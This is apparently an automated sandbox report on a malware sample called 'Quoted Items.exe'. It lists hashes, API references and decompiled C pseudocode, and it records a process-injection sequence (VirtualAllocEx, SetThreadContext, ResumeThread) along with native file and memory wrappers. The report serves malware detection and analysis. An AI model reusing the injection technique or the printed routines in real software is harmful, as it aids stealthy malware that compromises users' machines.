Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0583d73a2bad84fb385d2405b57766d43f8ca2eda80b616e9c66b450074d6da0
Instruction ID: a97af4d33c7a319c0828c9837dc6af02a4fb75e0e5e0c777b8aed70f192a5e5d
Opcode Fuzzy Hash: 0583d73a2bad84fb385d2405b57766d43f8ca2eda80b616e9c66b450074d6da0
Instruction Fuzzy Hash: 3E2126B1D003599FCB10DFAAC884BEEBBF5FF48314F10842AE919A7240D7789944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0783E570 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0783E5EE

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: ef4f0f5874f299c120313f20121728fe64e0aff63ff780ecc262f8f8c9130645
Instruction ID: 7d8377c04b3ea957afabb0bf64d10552d7652989800c94c7e19ebdbd3238f87f
Opcode Fuzzy Hash: ef4f0f5874f299c120313f20121728fe64e0aff63ff780ecc262f8f8c9130645
Instruction Fuzzy Hash: 682118B19043598FCB10DFAAC4847EEBBF4AF98224F15842EE519A7240DB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0783E918 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0783E998

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cbac9d18081648eb1dbe61cf383f9bbfeed5793805440d98026bae0d7387c283
Instruction ID: cfbe749a391f258f579bb4bb14ec9b869c8e0bbe335fa18dbc613ced1252fd2b
Opcode Fuzzy Hash: cbac9d18081648eb1dbe61cf383f9bbfeed5793805440d98026bae0d7387c283
Instruction Fuzzy Hash: E42116B18002599FCB10DFAAC880BEEBBF5FF48314F51842AE919A7250D7789944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0783E708 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0783E776

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0036abd0e8096a293971e552cc3cc2a7558fbe84ccb2abbe2eb71751aa669252
Instruction ID: d07affe22e9e6c7d627e67f2f5fd5fbc8685097c7f6f1d54ab0446f8b8e276c7
Opcode Fuzzy Hash: 0036abd0e8096a293971e552cc3cc2a7558fbe84ccb2abbe2eb71751aa669252
Instruction Fuzzy Hash: CF1119719002499FDF10DFAAC844BEFBBF5EF88324F25881AE529A7250C7759944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0783E490 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 0783E4F2

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 867ee6e1fd33000655209df8ccefe62c24570b61c39bcaf443c2bfe708fc9d0b
Instruction ID: 81bf5dca5787b5db64f40a4473d59bc6252edc491f0147f774883b2837f200f9
Opcode Fuzzy Hash: 867ee6e1fd33000655209df8ccefe62c24570b61c39bcaf443c2bfe708fc9d0b
Instruction Fuzzy Hash: 8F113AB1D043488BDB10DFAAC4447EFFBF4AF88224F25881ED519A7240DB74A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D6C618 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowLongW.USER32(?,?,?), ref: 02D6C675

Memory Dump Source

Source File: 00000000.00000002.286355741.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d60000_Quoted Items.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 75faab2a35514c23e86ac580ce22d9c9b114abe0a03b8f28c03e5658783358b5
Instruction ID: abf90456d628f44859626e6ae3b0248c1120e8bd9a5a634dcb40f6518a3a1087
Opcode Fuzzy Hash: 75faab2a35514c23e86ac580ce22d9c9b114abe0a03b8f28c03e5658783358b5
Instruction Fuzzy Hash: 301115B59002488FDB10CF9AD588BDEBBF8EB88324F10841AE855A3710C374A944CFB5

Uniqueness

Uniqueness Score: -1.00%

Function 0144D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286119024.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_144d000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5e5232fed4400f72f41538926f1d9aa1489f946cea86f538b31a3fe1d9b001c
Instruction ID: c4798bdede176d8cfd8dab471e519321943dcae5a40d0236cbcc7d56ec2a13f0
Opcode Fuzzy Hash: b5e5232fed4400f72f41538926f1d9aa1489f946cea86f538b31a3fe1d9b001c
Instruction Fuzzy Hash: C12129B1D04240DFEB01DF94D9C0B26BBA5FB94328F24C66EE9494B352C736D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0144D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286119024.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_144d000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcc7a0e8719709d526d9c0a4908b091916ab16668f0868480bb9740d2cb6dc5
Instruction ID: cd7f318ad1acb89d1607bb37545c235d2f1afa1e40b542e2f4c0fb31614c8875
Opcode Fuzzy Hash: 6fcc7a0e8719709d526d9c0a4908b091916ab16668f0868480bb9740d2cb6dc5
Instruction Fuzzy Hash: DE2134B1904240DFEB15DF94D8C0B26BBA5FB94358F24C5AEE90A4B356C73AD807CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0144D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286119024.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_144d000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca4a53df6fcebdc377faf68b83aa53d57646e5e50e2b7a4b7a867c2fc75c6a2
Instruction ID: 75989aa42a54fbe163a617520613fb65ec4bb99ac918e2ee7601f538bf49e7c8
Opcode Fuzzy Hash: 2ca4a53df6fcebdc377faf68b83aa53d57646e5e50e2b7a4b7a867c2fc75c6a2
Instruction Fuzzy Hash: F12180759093808FDB12CF24D594716BF71EB46214F28C5DBD8498B667C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0144D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286119024.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_144d000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc7e01eeaf6b7fcf3c612de606988f7e81d04e4c628bf39ec0a86da91ad33e64
Instruction ID: fb32d70e105f8df9f85343a7816b2629cfea2b6fcd0d9799f89d575a47ee5e34
Opcode Fuzzy Hash: dc7e01eeaf6b7fcf3c612de606988f7e81d04e4c628bf39ec0a86da91ad33e64
Instruction Fuzzy Hash: 01118B75904680DFEB12CF54D5C4B16BBB1FB84224F28C6AAD8494B766C33AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 078303F0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f326c1a8297a5807c8ccb50789f8b68976610fc3e6b033a296403c472ab17a
Instruction ID: 834fd2be03ebbe0cd57a7c01d91fbc8ebdf62c17599638af7a128b750e173160
Opcode Fuzzy Hash: 87f326c1a8297a5807c8ccb50789f8b68976610fc3e6b033a296403c472ab17a
Instruction Fuzzy Hash: C5D1F831C20B5A8ACB11EF64C854AA9B771FF95200F51CB9AE4197B214EF706EC4DB91

Uniqueness

Uniqueness Score: -1.00%

Function 07830400 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c361c139b13dd2ac567265370cd6e3385eb1b7cb687cff605722ad31dce31da6
Instruction ID: 55dc1df48551f077b05ad61a8a449dfef0dff939982a7b901a4ad67e8afd20ba
Opcode Fuzzy Hash: c361c139b13dd2ac567265370cd6e3385eb1b7cb687cff605722ad31dce31da6
Instruction Fuzzy Hash: AAD1F731C20B5A8ACB11FF64C894A99B771FF95200F51CB9AE4197B214EF706EC4DB91

Uniqueness

Uniqueness Score: -1.00%

Function 07835AC8 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac4d739e84e372a41192cf1fd3672d4ec248e23a9e23615a34f3951adbc3c71
Instruction ID: 1008d323a2c53a4972112fdfc57949245ef50862a17617782c56fffe664a3db5
Opcode Fuzzy Hash: fac4d739e84e372a41192cf1fd3672d4ec248e23a9e23615a34f3951adbc3c71
Instruction Fuzzy Hash: 32C186B5E016198FDB58DF6AC944AD9BBF2AF89304F15C0E9D809AB324DB305E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02D640B0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286355741.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d60000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f97597f8f056fc549c66b64bd6408abaabbce92926839d8d6af0a331b43fb8fc
Instruction ID: ff7c0b1352bf6ed3160b9d297927d10a4b623b13f17dc9a0b292ebd9cd8ac902
Opcode Fuzzy Hash: f97597f8f056fc549c66b64bd6408abaabbce92926839d8d6af0a331b43fb8fc
Instruction Fuzzy Hash: 4E617F79E006198FD748EFBAE46178ABBF3BBC9204F14C52AD014AB278EB745905CF51

Uniqueness

Uniqueness Score: -1.00%

Function 078356A3 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421367b15c12c797c997c20d8a196f8f32708cda44e7f5cd5599b489e090c9f9
Instruction ID: d7ef5d4caba7fd74aa55fc429f80f4f434507e42ad50ae365c4918ee8875b6dc
Opcode Fuzzy Hash: 421367b15c12c797c997c20d8a196f8f32708cda44e7f5cd5599b489e090c9f9
Instruction Fuzzy Hash: FC616974E102198FD748EFBAE84569ABFF3EFC9204F14C929E1049B2A4DF7868059F50

Uniqueness

Uniqueness Score: -1.00%

Function 02D640C0 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286355741.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d60000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b03f95b92ff0512032fdfe466ca7431654aab07a7e3c773d7c80c03a63d0b1a
Instruction ID: c847498e6e13704477212e6e96e74093cd804f000209f1dccb4e945820d2ce5b
Opcode Fuzzy Hash: 3b03f95b92ff0512032fdfe466ca7431654aab07a7e3c773d7c80c03a63d0b1a
Instruction Fuzzy Hash: AE616E78E006198FD748EFBAE46178ABBF3BBC9204F14C52AD014AB278EB745905CF51

Uniqueness

Uniqueness Score: -1.00%

Function 078356B0 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 381bfecf881e9dbeba8b4efcf8f27dd01e73e1ae191c3e23ce5dd8c2aab30447
Instruction ID: 018a904a8b2344d15bc24d738232b9869cc4d7c335e9bf2b34207c2ac424f954
Opcode Fuzzy Hash: 381bfecf881e9dbeba8b4efcf8f27dd01e73e1ae191c3e23ce5dd8c2aab30447
Instruction Fuzzy Hash: 36614A74E112198FD748EFBAE84569ABFF3EBC9204F14C929D1049B2A4DF7868059F50

Uniqueness

Uniqueness Score: -1.00%

Function 07836BF0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386e8ea7d9f2fd6a875e75240e493171da462014ef5e5d3e80472070a0f38d89
Instruction ID: 91c3c809962c4e2dd7fa0329d506a80fe26346fa76eef7e34d62eb42a122821d
Opcode Fuzzy Hash: 386e8ea7d9f2fd6a875e75240e493171da462014ef5e5d3e80472070a0f38d89
Instruction Fuzzy Hash: DB4144B1E01B189BEB5CCF6B8D4469EFAF7AFC9201F14C5BA840DA7254EB3019468F10

Uniqueness

Uniqueness Score: -1.00%

Function 07836BE0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5578cb471242351fa83003f07d87b63d218fb387d93961d56e0684eaa554343b
Instruction ID: 4eda0496addf19ce92ecf5a9611aeaf5368e722260c981b4a7fccaa5085ae518
Opcode Fuzzy Hash: 5578cb471242351fa83003f07d87b63d218fb387d93961d56e0684eaa554343b
Instruction Fuzzy Hash: 674125B1E11B189BEB5CCF6B8D4069EFAF7AFC9201F14C5BAC44CAA254EB3005468F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Quoted Items.exePID: 6688, Parent PID: 6360COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	688
Total number of Limit Nodes:	77

Executed Functions

Function 00418680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418683
0x0041868f
0x00418697
0x0041869c
0x004186a2
0x004186bd
0x004186c5
0x004186c9

APIs

NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5

Strings

b=A, xrefs: 004186BD, 004186C4
b=A, xrefs: 004186A2, 004186B0
!:A, xrefs: 0041869C, 004186A8

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b39
0x00409b4c
0x00409b4f
0x00409b54
0x00409b59
0x00409b63
0x00409b68
0x00409b6b
0x00409b6d
0x00409b75
0x00409b7a
0x00409b7a
0x00409b81
0x00409b89
0x00409b8c
0x00409b8e
0x00409ba2
0x00000000
0x00409ba4
0x00409baa
0x00409b5e
0x00409b5e
0x00409b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185D0 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185df
0x004185e7
0x0041861d
0x00418621

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187AA Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E004187AA(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _v117;
				long _t15;
				void* _t25;

				asm("daa");
				asm("in eax, dx");
				_t11 = _a4;
				_t4 = _t11 + 0xc60; // 0xca0
				E004191D0(_t25, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x004187ad
0x004187ae
0x004187b3
0x004187bf
0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b192ee78a2a19018707dab8068e69256a8e0ef565d56944463bca007bb55855a
Instruction ID: b481fdb0ced22d0f0280b4c0c4f73a85521607a05db72164c6dbcdfdf2fe1efe
Opcode Fuzzy Hash: b192ee78a2a19018707dab8068e69256a8e0ef565d56944463bca007bb55855a
Instruction Fuzzy Hash: FFF05E71200118AFDB14DF99CC91EEB77ADEF88354F148219FD189B291C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004187B0 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187bf
0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004186FA Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004186FA(intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t13;

				_t6 = _a4;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x409753
				E004191D0(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}

0x00418703
0x00418706
0x0041870f
0x00418717
0x00418725
0x00418729

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8c188e84467036fdc25452061c64e8bf377159e1ea27a2395850ea03acb310f8
Instruction ID: 299ac74be8a787466458dd7873c677ac47eca5b3783d9a43cd6ee95d083ddca2
Opcode Fuzzy Hash: 8c188e84467036fdc25452061c64e8bf377159e1ea27a2395850ea03acb310f8
Instruction Fuzzy Hash: 18E0C27A2002047BD710EB94CC49FD77B68EF44764F144459FA1C9B342C570EA01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00418700 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418703
0x00418706
0x0041870f
0x00418717
0x00418725
0x00418729

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quoted Items.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088C0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
